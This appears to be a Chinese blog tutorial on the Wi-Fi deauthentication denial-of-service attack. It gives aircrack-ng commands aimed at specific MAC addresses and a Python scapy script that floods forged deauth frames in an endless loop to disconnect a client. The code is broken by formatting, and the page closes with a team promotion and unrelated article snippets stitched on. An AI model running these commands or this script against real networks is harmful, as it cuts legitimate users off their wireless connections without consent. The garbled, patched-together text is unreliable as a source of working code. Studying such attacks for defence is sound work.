deaulth攻擊
deaulth攻擊全稱為取消身份驗證洪水攻擊或驗證阻斷洪水攻擊,通常被簡稱為deauth攻擊,是無線網路拒絕服務攻擊的一種形式。它旨在通過欺騙從ap到客戶端單播位址的取消身份驗證幀來將客戶端轉為未關聯/未認證的狀態。整個網路傳送了偽造的取消身份驗證報文,從而阻斷了合法使用者和ap之間的連線。當客戶端試圖與ap重新建立連線時攻擊者還在繼續向通道中傳送取消身份驗證幀,這將導致客戶端和ap始終無法重連。
它旨在通過欺騙從ap到客戶端單播位址的取消身份驗證幀來將客戶端轉為未關聯/未認證的狀態。
簡單來說就是攻擊者偽造取消認證報文幀,模擬ap發包欺騙被攻擊者主機
kali實現deauth攻擊
首先,需要乙個無線網絡卡,kali本身沒有無線網絡卡,從**上買乙個幾十塊錢,無線網絡卡到虛擬機器執行需要安裝對應的驅動,執行iwcofig/ifconfig看一下無線網絡卡有沒有載入成功
執行airmon-ng start wlan0啟動無線網絡卡雜合模式,對整個無線網路進行監聽
執行airodump-ng wlan0展示附近的無線詳細資訊
執行airodump-ng --bssid --channel 3 wlan0監控所要偽造ap的詳細資訊,目前有五個目標機器在連線
傳送乙個deauth管理幀,執行aireplay-ng -0 60 -a 40:31:3c:f5:fa:ce -c 90:78:41:30:02:f0 wlan0進行攻擊
結果就是qq掉線,網頁訪問不到
deauth攻擊**實現
deauth管理幀具體報文結構如下:
發的包足夠多快才能頂掉
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @file : deauth_attack.py
# @author: feng
# @date : 2020/11/23
# @desc : trace
from scapy.
allimport
*def
deauth_attack
(bssid, aim_mac, iface=
'intel(r) wireless-ac 9560 160mhz'):
# 構造deauth管理幀
pkt = radiotap(
)/dot11(subtype=
0xc, addr1=aim_mac, addr2=bssid, addr3=bssid)
/dot11deauth(reason=3)
# 傳送deauth管理幀
while
true
:print
('sending deauth to '
+ aim_mac)
sendp(pkt, iface=iface, inter=
0.05
, count=60)
if __name__ ==
'__main__'
: deauth_attack(
'40:31:3c:f5:fa:ce'
,'90:78:41:30:02:f0'
)
errors團隊源於網路空間安全的興趣愛好者共同組建,致力於從網路安全的各個層面維護國家網路空間安全,團隊成員擁有專業的滲透測試技術、安全評估能力、逆向分析技巧以及豐富的專案經驗和實戰經驗。該團隊是一支年輕的有生命力的團隊,旨在通過知識分享、技術**提公升網路安全意識和專業技能。
加入我們:
errors團隊主頁:
盒子團隊申請:
或者郵件聯絡: [email protected]
資料報絡 DEA 分析法python實現
企業管理者如何評估一所快餐分銷店 銀行支行 健康診所或初等學校的生產力?衡量生產力有三重困難 第一,什麼是系統適當的投入 如勞動力時間 材料金額 及其度量方法?第二,什麼是系統適當的產出 如現金支票 存款憑證 及其度量方法?第三,正確衡量這些投入產出之間關係的方法是什麼?衡量服務生產力 從工程學角度...
無線破解 無線還安全嗎?
由於在windows環境下不能如linux環境下直接呼叫無線網絡卡,所以需要使用其他工具將無線網絡卡載入,以便攻擊工具能夠正常使用,在無線攻擊套裝aircrack ng的windows版本下內建這樣的工具,就是aircrack ng,下面給大家介紹一下在ubuntu下aircrack ng工具包的使...
無線安全學習筆記
安全筆記 1.無線安全需要考慮的範圍 4 server的安全 越權操作檢查,csrf 請求回放 css跨站指令碼,sql注入等等 5 社會工程 員工安全培訓,公司系統許可權管理等 2.無線安全不需要考慮的範圍 1 ios系統被越獄的漏洞 1 資訊使用加密的方式儲存,可以使用自己想用的任何加密方式,也...